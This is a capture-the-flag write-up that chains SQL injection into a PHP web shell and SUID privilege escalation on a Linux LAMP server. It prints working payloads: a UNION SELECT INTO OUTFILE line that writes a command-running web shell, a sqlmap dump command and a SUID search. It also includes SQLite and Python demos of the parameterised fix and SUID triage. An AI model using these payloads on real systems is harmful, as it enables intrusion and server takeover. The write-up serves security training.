[Efiens CTF 2019 Write Up] From SQL Injection to RCE and Get ROOT!

Tram Ho

1. About the Challenge

This is a challenge from the EFIENS Individual CTF, run by EFIENS (a team currently ranked 3rd in Vietnam on CTFtime.org) in Jeopardy format from November 24 to December 1. Among the Web challenges is a chain of 3 tasks: SQLi => RCE => Get ROOT.

Through this challenge you will learn more about the dangers of SQLi, about dropping a web shell and reverse shell to execute commands on the victim, and about privilege escalation on Linux.

The challenge server has since been taken down.

2. Write up

2.1. SQL Injection

The website lets us look up a CSA officer's information by ID. When we enter an ID, the site returns the matching record, as shown below, with 4 columns:

To confirm there are exactly 4 columns, submit:
10" order by 5# : no rows are returned (the query errors out) => only 4 columns, as above

Note that the leading " in the payload closes a string literal and the trailing # comments out whatever follows, so the backend query is predictably something like:
SELECT id, name, username, email FROM TABLE_NAME WHERE id = "$_POST['text']"

Although I initially injected the queries by hand and still got the flag, in cases like this it is worth saving time with a tool, namely sqlmap:
The command: sudo sqlmap -r sqli.req --dump, where sqli.req is a text file containing the raw HTTP request sent to the web server (sqlmap then tests every parameter in it).
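To make the column-count probe and the UNION step concrete, here is an added example (not code from the write-up or the challenge) that models the predicted backend query in SQLite. The table and column names are assumptions, as is the second "users" table the injection reaches; the challenge used MySQL with a double-quoted id, but SQLite treats double quotes as identifiers, so this model quotes with ' and the payloads use ' in place of ".

```python
import sqlite3

# Constructed stand-in for the challenge's database (names are assumptions).
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE officers (id INTEGER, name TEXT, username TEXT, email TEXT);
        INSERT INTO officers VALUES (10, 'Alice Officer', 'alice', 'alice@example.org');
        INSERT INTO officers VALUES (11, 'Bob Officer', 'bob', 'bob@example.org');
        -- a second table the lookup form was never meant to expose
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hunter2');
    """)
    return con


def lookup_vulnerable(con, text):
    """The predicted backend: the POST value is concatenated straight into the SQL."""
    sql = f"SELECT id, name, username, email FROM officers WHERE id = '{text}'"
    return con.execute(sql).fetchall()


def lookup_safe(con, text):
    """Same lookup with a bound parameter: the input can only ever be a value."""
    sql = "SELECT id, name, username, email FROM officers WHERE id = ?"
    return con.execute(sql, (text,)).fetchall()


def probe_column_count(con, known_id="10", limit=20):
    """The ORDER BY n trick: the first n that errors is one past the column count."""
    for n in range(1, limit + 1):
        try:
            # '-- ' comments out the closing quote, like '#' did in the MySQL payload
            lookup_vulnerable(con, f"{known_id}' ORDER BY {n}-- ")
        except sqlite3.OperationalError:  # MySQL: "Unknown column 'n' in 'order clause'"
            return n - 1
    return None


def dump_users(con):
    """With 4 columns known, a UNION SELECT of 4 values pulls rows from another table."""
    payload = "' UNION SELECT id, username, password, 'x' FROM users-- "
    return lookup_vulnerable(con, payload)


if __name__ == "__main__":
    con = make_db()
    print("columns:", probe_column_count(con))
    print("leaked via UNION:", dump_users(con))
    print("same payload, parameterised:", lookup_safe(con, "' UNION SELECT 1,2,3,4-- "))
```

The parameterised lookup returns nothing for the injected string because the whole value is compared as data; that is the fix the vulnerable form is missing.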

2.2. Remote Code Execution

For going from SQLi to RCE, especially on websites running a LAMP stack like this one, you can refer to the DEFCON talk here. The images below are taken from that video.


From SQLi we can write a file on the server. Here I create a new PHP file containing a simple web shell:
<?php system($_GET["cmd"]); ?> and drop it into the web root with the payload:

" UNION SELECT 1,2,3,'123 <?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/rce.php'#

This only works when the MySQL account has the FILE privilege, secure_file_priv is empty (not set to a restricted directory or NULL), the target path does not already exist, and the mysqld process can write to the web root. MySQL writes the row with tab-separated fields, so rce.php starts with 1, 2, 3 and 123 before the PHP tag; PHP just echoes that text ahead of the command output, which does no harm.

Once RCE works (rce.php?cmd=id confirms it), the only remaining task is cat flag.txt

2.3. Get Root

The referenced article lists 6 main Linux privilege escalation methods; here we use Exploiting SUID executables. For details, see the article here.

Once RCE works, I use the web shell to launch a PHP-based reverse shell back to a netcat listener, which is far easier to work with than sending one command at a time through the URL.

List all files with the SUID bit set: find / -perm -u=s -type f 2>/dev/null (the redirect hides the permission-denied noise); then compare the list against the binaries a stock install normally ships with SUID, since the unusual ones are the candidates.

With the SUID time binary we can execute commands as root:

From here it is just a matter of reading the flag with cat:
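As an added example (not from the write-up), the following reproduces what the find command above does and adds the triage step a practitioner wants: it walks a tree, collects regular files with the setuid bit, and separates the SUID binaries a stock Linux system is expected to carry from anything unexpected. The EXPECTED_SUID baseline is an assumption (a hand-picked subset, not a full inventory), and make_sample_tree builds a constructed directory so the code runs offline without touching the real filesystem.

```python
import os
import stat
import tempfile

# Assumed baseline of SUID binaries normally present on a Linux install.
EXPECTED_SUID = {
    "passwd", "su", "sudo", "mount", "umount", "ping", "chsh", "chfn",
    "gpasswd", "newgrp", "fusermount", "pkexec",
}


def find_suid(root="/"):
    """Equivalent of `find ROOT -perm -u=s -type f`: regular files with the setuid bit."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks, like find
            except OSError:          # permission denied, file vanished, etc.
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def triage_suid(paths):
    """Split SUID files into expected system binaries and the ones worth a closer look."""
    expected, suspicious = [], []
    for p in paths:
        bucket = expected if os.path.basename(p) in EXPECTED_SUID else suspicious
        bucket.append(p)
    return expected, suspicious


def make_sample_tree():
    """Constructed sample: a temp dir with an SUID 'passwd', an SUID 'time' and a plain 'ls'."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    paths = {}
    for name, mode in (("passwd", 0o4755), ("time", 0o4755), ("ls", 0o755)):
        p = os.path.join(root, name)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(p, mode)
        paths[name] = p
    return root, paths


if __name__ == "__main__":
    root, _ = make_sample_tree()
    known, odd = triage_suid(find_suid(root))
    print("expected SUID binaries:", known)
    print("check these against GTFOBins:", odd)
```

Run against / on the target, the second list is where an SUID copy of time (or any other non-standard binary) shows up; the bit alone does not make it exploitable, so each hit still needs checking against a resource such as GTFOBins.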

3. Conclusion

This is an open-ended and interesting challenge. By hunting for the flags you can learn a few more things about security and about vulnerabilities in a system.


Source : Viblo